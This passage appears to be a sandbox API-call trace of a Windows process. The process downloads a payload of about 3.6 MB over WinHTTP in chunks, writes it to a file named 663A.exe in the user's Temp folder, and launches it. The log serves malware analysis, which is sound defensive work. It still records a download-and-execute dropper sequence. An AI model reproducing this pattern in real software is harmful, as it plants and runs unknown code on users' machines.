hRequest=0x71cad70, lpBuffer=0x8dce040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8dce040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0121.922] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8ae0040, Size=0x2f3000) returned 0x8500040 [0121.992] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x87f0840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x87f0840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0121.993] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x2f5800) returned 0x8800040 [0122.092] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8af3040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8af3040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0122.093] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8800040, Size=0x2f8000) returned 0x8500040 [0122.664] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x87f5840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x87f5840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0122.664] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x2fa800) returned 0x8800040 [0122.720] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8af8040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8af8040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0122.720] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8800040, Size=0x2fd000) returned 0x8500040 [0122.776] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x87fa840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x87fa840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0122.801] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x2ff800) returned 0x8800040 [0122.863] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8afd040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8afd040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0122.863] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8800040, Size=0x302000) returned 0x8cc0040 [0122.926] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8fbf840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8fbf840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0122.949] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8cc0040, Size=0x304800) returned 0x8500040 [0123.022] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8802040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8802040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0123.023] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x307000) returned 0x8810040 [0123.105] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8b14840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8b14840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0123.105] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8810040, Size=0x309800) returned 0x8500040 [0123.170] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8807040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8807040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0123.171] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x30c000) returned 0x8810040 [0123.274] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8b19840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8b19840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0123.275] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8810040, Size=0x30e800) returned 0x8500040 [0123.331] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x880c040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x880c040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0123.359] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x311000) returned 0x8810040 [0123.419] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8b1e840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8b1e840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0123.421] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8810040, Size=0x313800) returned 0x8cc0040 [0123.479] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8fd1040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8fd1040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0123.506] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8cc0040, Size=0x316000) returned 0x8500040 [0123.566] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8813840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8813840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0123.566] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x318800) returned 0x8820040 [0123.633] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8b36040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8b36040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0123.658] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8820040, Size=0x31b000) returned 0x8500040 [0123.715] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8818840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8818840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0123.716] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x31d800) returned 0x8820040 [0123.773] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8b3b040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8b3b040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0123.798] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8820040, Size=0x320000) returned 0x8cc0040 [0123.860] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8fdd840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8fdd840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0123.860] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8cc0040, Size=0x322800) returned 0x8500040 [0123.919] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8820040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8820040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0123.943] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x325000) returned 0x8cc0040 [0124.009] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8fe2840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8fe2840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0124.010] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8cc0040, Size=0x327800) returned 0x8500040 [0124.068] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8825040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8825040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0124.092] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x32a000) returned 0x8cc0040 [0124.150] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8fe7840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8fe7840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0124.151] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8cc0040, Size=0x32c800) returned 0x8500040 [0124.287] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x882a040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x882a040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0124.313] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x32f000) returned 0x8cc0040 [0124.373] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8fec840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8fec840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0124.373] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8cc0040, Size=0x331800) returned 0x8500040 [0124.433] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x882f040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x882f040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0124.458] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x334000) returned 0x8cc0040 [0124.517] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8ff1840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8ff1840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0124.518] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8cc0040, Size=0x336800) returned 0x8500040 [0124.581] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8834040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8834040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0124.608] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x339000) returned 0x8cc0040 [0124.670] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8ff6840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8ff6840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0124.670] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8cc0040, Size=0x33b800) returned 0x8500040 [0124.756] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8839040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8839040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0124.757] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x33e000) returned 0x8cc0040 [0124.825] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8ffb840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8ffb840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0124.850] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8cc0040, Size=0x340800) returned 0x8500040 [0124.912] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x883e040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x883e040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0124.913] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x343000) returned 0x8cc0040 [0125.001] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x9000840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x9000840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0125.002] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8cc0040, Size=0x345800) returned 0x8500040 [0125.076] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8843040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8843040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0125.105] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x348000) returned 0x8cc0040 [0125.247] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x9005840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x9005840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0125.276] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8cc0040, Size=0x34a800) returned 0x8500040 [0125.352] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8848040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8848040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0125.354] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x34d000) returned 0x8cc0040 [0125.459] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x900a840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x900a840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0125.459] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8cc0040, Size=0x34f800) returned 0x8500040 [0125.524] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x884d040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x884d040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0125.525] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x352000) returned 0x8cc0040 [0125.621] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x900f840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x900f840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0125.622] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8cc0040, Size=0x354800) returned 0x8500040 [0125.716] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8852040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8852040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0125.716] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x357000) returned 0x8cc0040 [0125.780] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x9014840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x9014840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0125.781] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8cc0040, Size=0x359800) returned 0x8500040 [0125.887] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8857040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8857040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0125.888] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x35c000) returned 0x8cc0040 [0125.969] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x9019840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x9019840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0126.000] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8cc0040, Size=0x35e800) returned 0x8500040 [0126.078] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x885c040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x885c040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0126.079] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x361000) returned 0x8cc0040 [0126.226] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x901e840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x901e840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0126.227] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8cc0040, Size=0x363800) returned 0x8500040 [0126.323] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8861040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8861040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0126.323] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x366000) returned 0x8cc0040 [0126.394] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x9023840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x9023840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0126.424] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8cc0040, Size=0x368800) returned 0x8500040 [0126.504] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8866040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8866040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0126.509] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x36b000) returned 0x8cc0040 [0127.122] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x9028840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x9028840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0127.123] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8cc0040, Size=0x36d800) returned 0x8500040 [0127.237] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x886b040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x886b040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0127.273] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x370000) returned 0x8cc0040 [0127.349] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x902d840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x902d840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0127.349] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8cc0040, Size=0x372800) returned 0x8500040 [0127.459] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8870040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8870040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0127.460] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x375000) returned 0x8cc0040 [0127.571] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x9032840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x9032840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2600) returned 1 [0127.572] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8cc0040, Size=0x377800) returned 0x8500040 [0127.649] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8874e40, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8874e40*, lpdwNumberOfBytesRead=0x7d6f858*=0x0) returned 1 [0127.649] VirtualAlloc (lpAddress=0x0, dwSize=0x374e00, flAllocationType=0x3000, flProtect=0x4) returned 0x8cc0000 [0127.723] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x8500040) returned 1 [0127.779] WinHttpCloseHandle (hInternet=0x71cad70) returned 1 [0127.781] WinHttpCloseHandle (hInternet=0x3f83fd0) returned 1 [0127.781] WinHttpCloseHandle (hInternet=0x3fb03a0) returned 1 [0127.782] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f14410) returned 0x10c [0127.782] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f14410) returned 1 [0127.783] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f14390) returned 0x6a [0127.783] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f14390) returned 1 [0127.783] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f14370) returned 0x13 [0127.783] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f14370) returned 1 [0127.783] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x210) returned 0x8300080 [0127.783] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x210) returned 0x83002a0 [0127.784] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x83002a0 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25 [0127.784] lstrcatW (in: lpString1="", lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\" | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\" [0127.784] GetTempFileNameW (in: lpPathName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", lpPrefixString=0x0, uUnique=0x0, lpTempFileName=0x83002a0 | out: lpTempFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\663A.tmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\663a.tmp")) returned 0x663a [0127.792] DeleteFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\663A.tmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\663a.tmp")) returned 1 [0127.793] lstrlenW (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\663A.tmp") returned 45 [0127.793] lstrcatW (in: lpString1="", lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\663A" | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\663A") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\663A" [0127.794] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x83002a0) returned 0x210 [0127.794] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x83002a0) returned 1 [0127.794] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x12) returned 0x83002a0 [0127.794] lstrcatW (in: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\663A", lpString2=".exe" | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\663A.exe") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\663A.exe" [0127.794] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x83002a0) returned 0x12 [0127.794] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x83002a0) returned 1 [0127.794] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\663A.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\663a.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1474 [0127.795] WriteFile (in: hFile=0x1474, lpBuffer=0x8cc0000*, nNumberOfBytesToWrite=0x374e00, lpNumberOfBytesWritten=0x7d6f8b8, lpOverlapped=0x0 | out: lpBuffer=0x8cc0000*, lpNumberOfBytesWritten=0x7d6f8b8*=0x374e00, lpOverlapped=0x0) returned 1 [0127.874] CloseHandle (hObject=0x1474) returned 1 [0127.971] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName=0x0, lpCommandLine="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\663A.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", lpStartupInfo=0x7d6f8e0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x7d6f8c0, hNewToken=0x0 | out: lpProcessInformation=0x7d6f8c0*(hProcess=0x1504, hThread=0x1474, dwProcessId=0xeb4, dwThreadId=0xeb8), hNewToken=0x0) returned 1 [0128.056] CloseHandle (hObject=0x1504) returned 1 [0128.057] CloseHandle (hObject=0x1474) returned 1 [0128.057] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x506f94e9 [0128.057] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0xed) returned 0x83002a0 [0128.057] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7e55db88 [0128.057] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x14fd4128 [0128.057] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4b4fe589 [0128.057] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1639516d [0128.057] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x543e65c8 [0128.057] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x12074db3 [0128.057] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xabcda43 [0128.057] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4d387bab [0128.057] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x74ba80ab [0128.057] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6ff84616 [0128.057] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6fbc1111 [0128.057] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x50da4440 [0128.057] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x21d4abb4 [0128.057] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6e86c28c [0128.057] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xa7b19d2 [0128.057] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7997a12c [0128.057] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2801d570 [0128.057] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x21622382 